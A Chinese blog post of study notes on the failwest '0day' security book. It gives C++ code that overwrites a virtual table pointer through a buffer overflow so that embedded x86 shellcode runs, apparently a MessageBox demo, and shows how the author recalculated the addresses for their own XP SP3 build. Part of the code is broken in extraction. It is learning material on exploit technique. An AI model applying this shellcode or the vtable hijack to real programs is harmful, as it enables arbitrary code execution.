读0day攻击C++函数心得

废话不说，直接上代码 原版代码:

#include "windows.h" #include "iostream.h" char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

 "\x1C\x88\x40\x00";

//set fake virtual function pointer

class Failwest 

{

 public: char buf[200]; 

virtual void test(void)

 { 

cout<<"Class Vtable::test()"<test();

 }

Failwest overflow, *p;

void main(void)

{

char * p_vtable;

p_vtable=overflow.buf-4;//point to virtual table

//__asm int 3

//reset fake virtual table to 0x004088cc

//the address may need to ajusted via runtime debug

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

strcpy(overflow.buf,shellcode);//set fake virtual function pointer

p=&overflow;

p->test();

}

这是failwest书里原版代码。其附带的exe,经实测，可以在xp,sp3下运行。

但是很奇怪的是，我把源代码一字不改的重新在上述环境里编译后，却不能正常运行，不知道为什么。

于是，想到要改写程序，以适应实际的环境。

用paintf("%x\n",overflow.buf);得到overflow.buf为0x40BAAC

于是将源代码改写为

        p_vtable[0]=0xAC - 4;

p_vtable[1]=0xBA;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

程序正常运行。
原因：将虚表指针p_vtable改写为0x40BAA8，则程序执行到p->test()时，将按照伪造的虚函数指针去0x40BAA8寻找虚表，而0x40BAA8地址值也为0x40BAA8，即为无效指令，对程序执行无影响。但是EIP+4，跳到了shellcode的起始地址处，开始执行了shellcode,于是程序正常运行。(见下图)

法二:

分析原代码可知:

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

执行后，
0x4088CC指向shellcode的末尾，在这里填上shellcode的起始位置0x0040881c作为伪造的虚函数入口地址，程序将最终去执行shellcode。

那么0x4088CC是怎么来的呢？

也就是shellcode首地址0x40881C + 176(0B0h) = 0x4088CC ,176为不加最后四字节"\x1C\x88\x40\x00"的shellcode的长度。

既然这样，那就好办了。

得到在我的系统里overflow.buf为0x40BAAC，那么加上0B0h，得0x40BB5C，即

p_vtable[0]=0x5c;

p_vtable[1]=0xbb;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

然后将shellcode最后的入口地址改为

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

"\xac\xba\x40\x00";//set fake virtual function pointer

即可。

虽然原理比较简单，但这次是我第一次正儿八经的写次博客，这么少的字，但是中途还是有让我不想写的念头。但觉得既然决定了，就好好的写下去，毕竟写技术博客只有好处，没有坏处。

以后会继续写下去，争取写得更通俗易懂。